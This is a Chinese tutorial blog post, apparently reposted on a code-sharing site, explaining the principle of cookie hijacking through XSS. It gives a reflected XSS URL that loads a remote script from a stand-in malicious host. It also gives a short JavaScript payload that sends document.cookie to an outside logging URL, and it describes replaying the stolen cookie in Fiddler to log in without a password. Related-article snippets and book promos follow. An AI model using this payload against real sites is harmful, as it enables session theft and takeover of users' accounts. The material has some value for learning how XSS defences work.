说说劫持Cookie的理

2024-05-29 21:18
文章标签 cookie 劫持

本文主要是介绍说说劫持Cookie的理,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

说说劫持 Cookie 的原理

完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。

Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie 被劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。

1 窃取 Cookie

首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形如:

http://www.xxx.com/xxx.html?param="><script src=http://www.malice.com/malice.js></script>
  • 1

XSS Payload 写在 malice.js 中,这样就可以避免直接在 URL 参数中写入大量的脚本代码。

malice.js 内容:

var img = document.createElement("img");
img.src = "http://xxx.com/log?" + escape(document.cookie);
document.body.appendChild(img);
  • 1
  • 2
  • 3

escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串。

在此,我们动态创建了一个图片标签,并把 cookie 参数作为对象,发送给后端服务器。

这样就完成了窃取 Cookie 的整个过程。

2 利用 Cookie 登陆账户

一个网站,如果还未登录,一般在右上角有个 “登录” 链接:

假设已经得到了某个账户的 Cookie 信息,那么就可以在 Fiddler 中,模拟 Get 请求:

然后就可以成功登陆网站咯:


《算法导论 第三版英文版》_高清中文版

《深度学习入门:基于Python的理论与实现》_高清中文版

《深入浅出数据分析》_高清中文版

《Python编程:从入门到实践》_高清中文版

《Python科学计算》_高清中文版

《深度学习入门:基于Python的理论与实现》_高清中文版

《深入浅出数据分析》_高清中文版

《Python编程:从入门到实践》_高清中文版


这篇关于说说劫持Cookie的理的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1014666

相关文章

JavaScript中document.cookie

“某些 Web 站点在您的硬盘上用很小的文本文件存储了一些信息,这些文件就称为 Cookie。”—— MSIE 帮助。一般来说,Cookies 是 CGI 或类似,比 HTML 高级的文件、程序等创建的,但是 javascript 也提供了对 Cookies 的很全面的访问权利。       每个 Cookie 都是这样的:<cookie名>=<值>   <cookie名>的限制与 javasc

flask-login 生成 cookie,session

flask-login 生成 cookie,session Flask-Login login_user() 显示来自 Set-Cookie 标头的加密 cookie # 模拟一个用户类class User(UserMixin):def __init__(self, id):self.id = id@app.route('/login')def login():# 模拟用户登录过程user

第143天:内网安全-权限维持自启动映像劫持粘滞键辅助屏保后门WinLogon

案例一: 权限维持-域环境&单机版-自启动 自启动路径加载 路径地址 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\##英文C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动\ #

【Http 每日一问,访问服务端的鉴权Token放在header还是cookie更合适?】

结论先行: token静态的,不变的,放在header里面。 典型场景 ,每次访问时需要带个静态token请求服务端,向服务端表明是谁请求,此时token也可以认为是个固定的access-key。token动态的,会失效,放在cookie里面。 典型场景,业务登录态token,存在有效期的,过一段时间可能会失效。 下面具体展开下。 在选择将鉴权 Token 放在 HTTP Header 还是

剖析Cookie的工作原理及其安全风险

Cookie的工作原理主要涉及到HTTP协议中的状态管理。HTTP协议本身是无状态的,这意味着每次请求都是独立的,服务器不会保留之前的请求信息。为了在无状态的HTTP协议上实现有状态的会话,引入了Cookie机制。 1. Cookie定义 Cookie,也称为HTTP cookie、web cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备

cookie实战案例-自动登录网站

在写爬虫的时候,要伪装成真实用户请求。可能需要大量的IP地址,那么大量的IP地址从哪里来呢?这里就需要用代理IP来解决了,有的网站专门通过提供代理IP池服务作为主要的经营业务,只要注册相关网站开通对应套餐就可以了。 这次我们以自动登录一个爬虫代理 IP 网站来做为实战案例: 直接看代码: 账号我已经实现注册好了,可以用代码中的测试账号,也可以自己手动注册一个。 from selenium

关于cookie和session的直观讲解(二)

前言 上一章,讲解了Cookie,本章介绍Session. 概念:服务器端会话技术,在一次会话的多次请求间共享数据,将数据保存在服务器端的对象中HttpSession。 Session 基础 获取HttpSession对象: HttpSession session = request.getSession(); 使用HttpSession对象: Object getAttribute

token和cookie的区别以及接口测试怎么找接口中的token和cookie

token和cookie是什么? token和cookie是用于身份验证和会话管理的两种技术。token是一种授权用户对特定资源访问的临时凭证,通常用于API身份验证、移动设备认证和单点登录等场景,而cookie是存储在客户端浏览器中的小型文本文件,通常用于跟踪用户在网站上的活动并提供个性化服务。token通常更安全,因为它是加密的,而cookie是明文的。然而,token的有效期通常很短,需要

Cookie是什么

cookie HTTP cookie通常被叫做cookie,最初是用在客戶端存储会话信息。这个规范要求服务器在响应HTTP请求的时候,发送set-cookie的开头包含会话信息 HTTP协议是无状态的,意为,HTTP服务器不必记住不同客户端发送的请求, 为了降低访问服务器的时间间隔,1994年Netscape公司发明了一种名为cookie的解决方案,cookie是在程序之间传递的一小段信息,

JavaWeb 会话跟踪技术Cookie和Session

超详细的Java知识点路线图 会话跟踪 会话就是客户端和服务器之间从连接到断开的过程。 Http协议是无状态的,也就是说断开连接后服务器不会记录用户的状态,有时候我们需要知道之前会话的用户状态,这就需要会话跟踪技术。 会话跟踪的几种实现: Session 在服务器端保存数据。Cookie 在浏览器端保存数据。URL重写 在URL中强行加入参数以实现数据传递,主要用于Cookie和Se